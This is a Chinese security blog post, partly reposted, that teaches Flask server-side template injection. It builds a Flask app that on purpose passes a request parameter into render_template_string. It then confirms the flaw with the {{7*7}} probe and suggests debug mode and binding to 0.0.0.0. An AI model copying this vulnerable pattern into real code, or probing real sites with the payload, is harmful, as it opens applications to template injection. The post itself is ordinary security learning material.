<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"monkeyx1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"show_result":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="原创文章：  先知社区——小猪佩奇 FreeBuf——DeceaseWolf  鸣谢首先还是感谢两位师傅的文章，受益匪浅！本文主要是转载和自我学习。 SSTI模板注入的成因SSTI服务端模板注入，SSTI主要为python的一些框架 jinja2、mako、tornado、django，PHP框架smarty、twig，以及Java的框架jade、velocity使用了渲染函数时，由于代码的不规范">
<meta property="og:type" content="article">
<meta property="og:title" content="flask之ssti模板注入知识点及复现">
<meta property="og:url" content="https://monkeyx1.github.io/2022/09/11/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="柷澂">
<meta property="og:description" content="原创文章：  先知社区——小猪佩奇 FreeBuf——DeceaseWolf  鸣谢首先还是感谢两位师傅的文章，受益匪浅！本文主要是转载和自我学习。 SSTI模板注入的成因SSTI服务端模板注入，SSTI主要为python的一些框架 jinja2、mako、tornado、django，PHP框架smarty、twig，以及Java的框架jade、velocity使用了渲染函数时，由于代码的不规范">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-103-1024x542.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-105-1024x539.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-106-1024x542.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-107-1024x541.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-108-1024x97.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-111-1024x544.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-112-1024x97.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-114-1024x106.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-115-1024x149.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-116-1024x104.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-117-1024x94.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-119-1024x108.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-120-1024x546.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-121-1024x129.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-122-1024x540.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-123-1024x123.png">
<meta property="article:published_time" content="2022-09-11T09:08:25.000Z">
<meta property="article:modified_time" content="2024-07-27T17:31:00.693Z">
<meta property="article:author" content="柷澂">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta property="article:tag" content="安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://monkeyx1.github.io/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-103-1024x542.png">


<link rel="canonical" href="https://monkeyx1.github.io/2022/09/11/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://monkeyx1.github.io/2022/09/11/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/","path":"2022/09/11/flask之ssti模板注入知识点及复现/","title":"flask之ssti模板注入知识点及复现"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>flask之ssti模板注入知识点及复现 | 柷澂</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">柷澂</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">欢迎来到柷澂的安全小窝</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%B8%A3%E8%B0%A2"><span class="nav-number">1.</span> <span class="nav-text">鸣谢</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9A%84%E6%88%90%E5%9B%A0"><span class="nav-number">2.</span> <span class="nav-text">SSTI模板注入的成因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E"><span class="nav-number">3.</span> <span class="nav-text">模板引擎</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0flask%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">4.</span> <span class="nav-text">本地flask环境搭建</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#route%E8%A3%85%E9%A5%B0%E5%99%A8%E8%B7%AF%E7%94%B1"><span class="nav-number">5.</span> <span class="nav-text">route装饰器路由</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#main%E5%85%A5%E5%8F%A3"><span class="nav-number">6.</span> <span class="nav-text">main入口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A8%A1%E6%9D%BF%E6%B8%B2%E6%9F%93"><span class="nav-number">7.</span> <span class="nav-text">模板渲染</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#flask-SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%A4%8D%E7%8E%B0"><span class="nav-number">8.</span> <span class="nav-text">flask SSTI模板注入复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">9.</span> <span class="nav-text">其他知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#CTF%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="nav-number">9.1.</span> <span class="nav-text">CTF中的一些绕过技巧</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="柷澂"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">柷澂</p>
  <div class="site-description" itemprop="description">心如明镜台，时时勤拂拭</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/monkeyx1" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;monkeyx1" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:647498949@qq.com" title="E-Mail → mailto:647498949@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://monkeyx1.github.io/2022/09/11/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="柷澂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="柷澂">
      <meta itemprop="description" content="心如明镜台，时时勤拂拭">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="flask之ssti模板注入知识点及复现 | 柷澂">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          flask之ssti模板注入知识点及复现
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-09-11 17:08:25" itemprop="dateCreated datePublished" datetime="2022-09-11T17:08:25+08:00">2022-09-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-07-28 01:31:00" itemprop="dateModified" datetime="2024-07-28T01:31:00+08:00">2024-07-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">web安全学习</span></a>
        </span>
    </span>

  
    <span id="/2022/09/11/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/" class="post-meta-item leancloud_visitors" data-flag-title="flask之ssti模板注入知识点及复现" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>4.5k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>4 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>原创文章：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3679">先知社区——小猪佩奇</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/260504.html">FreeBuf——DeceaseWolf</a></li>
</ul>
<h3 id="鸣谢"><a href="#鸣谢" class="headerlink" title="鸣谢"></a>鸣谢</h3><p>首先还是感谢两位师傅的文章，受益匪浅！本文主要是转载和自我学习。</p>
<h3 id="SSTI模板注入的成因"><a href="#SSTI模板注入的成因" class="headerlink" title="SSTI模板注入的成因"></a>SSTI模板注入的成因</h3><p>SSTI服务端模板注入，SSTI主要为python的一些框架 jinja2、mako、tornado、django，PHP框架smarty、twig，以及Java的框架jade、velocity使用了渲染函数时，由于代码的不规范或者是开发者过分信赖用户输入而导致了服务端模板注入。</p>
<h3 id="模板引擎"><a href="#模板引擎" class="headerlink" title="模板引擎"></a>模板引擎</h3><ul>
<li><p>什么是模板引擎？我们为什么要使用模板？</p>
<ul>
<li>模板引擎可以让（网站）程序实现界面与数据分离，业务代码与逻辑代码的分离，可以大大提升开发效率，良好的设计也使得代码重用变得更加容易。</li>
</ul>
</li>
<li><p>拿到数据之后，然后塞到模板中，再让渲染引擎将塞进去的东西生成html的文本发送给浏览器，这样可以提高效率。</p>
</li>
</ul>
<h3 id="本地flask环境搭建"><a href="#本地flask环境搭建" class="headerlink" title="本地flask环境搭建"></a>本地flask环境搭建</h3><p>环境：3.10<br>工具：pycharm专业版</p>
<ul>
<li>首先新建项目</li>
</ul>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-103-1024x542.png" alt="img"></p>
<ul>
<li>选择flask项目，点击创建</li>
</ul>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-105-1024x539.png" alt="img"></p>
<ul>
<li>出现这样的界面</li>
</ul>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-106-1024x542.png" alt="img"></p>
<ul>
<li>右键进行调试，如果出现报错的话，是因为你没有安装flask模块，使用<code>pip install flask</code>进行安装重新运行即可</li>
</ul>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-107-1024x541.png" alt="img"></p>
<ul>
<li>访问指定链接，看到如下页面说明成功了</li>
</ul>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-108-1024x97.png" alt="img"></p>
<h3 id="route装饰器路由"><a href="#route装饰器路由" class="headerlink" title="route装饰器路由"></a>route装饰器路由</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/&#x27;)</span><br></pre></td></tr></table></figure>

<p>使用route()装饰器告诉Flask是什么样的URL才能触发我们的函数.route()装饰器把一个函数绑定到对应的URL上，这就相当于路由，一个路由会跟着一个函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>) </span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">test</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;123&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-111-1024x544.png" alt="img"></p>
<p>然后我们进行访问</p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-112-1024x97.png" alt="img"></p>
<p>我们在这里修改一下规则，使用下面的这段代码来设置动态网址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/hello/&lt;username&gt;&quot;</span></span>) </span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hello_user</span>(<span class="params">username</span>): </span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;user:%s&quot;</span> % username</span><br></pre></td></tr></table></figure>

<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-114-1024x106.png" alt="img"></p>
<blockquote>
<p>int 接受整数<br>float 接收浮点数<br>path 和默认的相似，但也接收斜线</p>
</blockquote>
<h3 id="main入口"><a href="#main入口" class="headerlink" title="main入口"></a>main入口</h3><p>当python文件运行的时候，在<code>if __name__ == &#39;__main__&#39;</code>下面的代码将会运行，当python文件被导入的时候，在<code>if __name__ == &#39;__main__&#39;</code>下面的代码将不会运行。</p>
<blockquote>
<p>测试的时候，我们可以使用debug，方便调试，增加一句：app.debug &#x3D; True</p>
<p>这个可以让操作系统监听所有的公网IP，就可以在公网上面看到自己的web了：app.run(host&#x3D;’0.0.0.0’)</p>
</blockquote>
<h3 id="模板渲染"><a href="#模板渲染" class="headerlink" title="模板渲染"></a>模板渲染</h3><p>我们可以使用<code>render_template()</code>方法来渲染模板。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 模板渲染实例</span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template </span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/hello/&#x27;</span></span>) </span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/hello/&lt;name&gt;&#x27;</span></span>) </span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hello</span>(<span class="params">name=<span class="literal">None</span></span>):</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, name=name)</span><br></pre></td></tr></table></figure>

<p>html文件是放在<code>templates</code>文件夹当中的，然后我们放一个<code>index.html</code>到该文件夹当中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;h1&gt;Hello, &#123;&#123;user.name&#125;&#125;!&lt;/h1&gt;</span><br></pre></td></tr></table></figure>

<p>这里只放了一个参数进行渲染，然后我们在app.py文件中进行渲染</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/index&#x27;</span></span>) </span></span><br><span class="line"><span class="comment"># 我们访问/或者/index都会跳转 </span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    user = &#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;小菜猴子&#x27;</span>&#125;</span><br><span class="line">    <span class="comment"># 传入一个字典数组 </span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, user=user)</span><br></pre></td></tr></table></figure>

<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-115-1024x149.png" alt="img"></p>
<h3 id="flask-SSTI模板注入复现"><a href="#flask-SSTI模板注入复现" class="headerlink" title="flask SSTI模板注入复现"></a>flask SSTI模板注入复现</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string </span><br><span class="line"></span><br><span class="line">app = Flask(__name__) </span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/test/&#x27;</span></span>) </span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">test</span>(): </span><br><span class="line">    code = request.args.get(<span class="string">&#x27;id&#x27;</span>)</span><br><span class="line">    html = <span class="string">&#x27;&#x27;&#x27; &lt;h3&gt;%s&lt;/h3&gt; &#x27;&#x27;&#x27;</span> % code</span><br><span class="line">    <span class="keyword">return</span> render_template_string(html) </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>: </span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p>输入<code>&#123;&#123;7*7&#125;&#125;</code>发现回显的是49，说明存在SSTI模板注入</p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-116-1024x104.png" alt="img"></p>
